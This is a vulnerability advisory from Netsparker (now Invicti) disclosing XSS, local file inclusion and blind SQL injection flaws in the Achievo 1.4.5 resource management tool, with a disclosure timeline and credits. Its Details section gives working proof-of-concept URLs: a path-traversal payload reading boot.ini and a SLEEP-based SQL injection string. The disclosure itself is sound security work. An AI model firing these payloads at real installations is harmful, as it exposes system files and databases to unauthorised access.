XSS, LFI and SQL Injection Vulnerabilities in Achievo

Information

Advisory by Netsparker (now Invicti)
Name:  XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software:  Achievo 1.4.5 and possibly below.
Vendor Homepage:  http://www.achievo.org
Vulnerability Type:  Cross-Site Scripting, Local File Inclusion and SQL Injection
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference:  NS-12-016

Description

Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities will enable organizations to support their business processes in a simple, but effective manner.

Details

Achievo is affected by XSS, LFI, and SQL Injection vulnerabilities in version 1.4.5.

  • XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString)
  • LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
  • SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3

Learn more about Cross-Site Scripting, LFI, and blind SQL Injection vulnerabilities:

Advisory Timeline

23/01/2011 – First contact
25/02/2012 – Second contact – No response
01/11/2012 – Advisory released

Credits

It has been discovered on testing of Invicti Web Application Security Scanner.

References

  1. MSL Advisory Link: /xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
  2. Invicti Advisories: /web-applications-advisories/

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.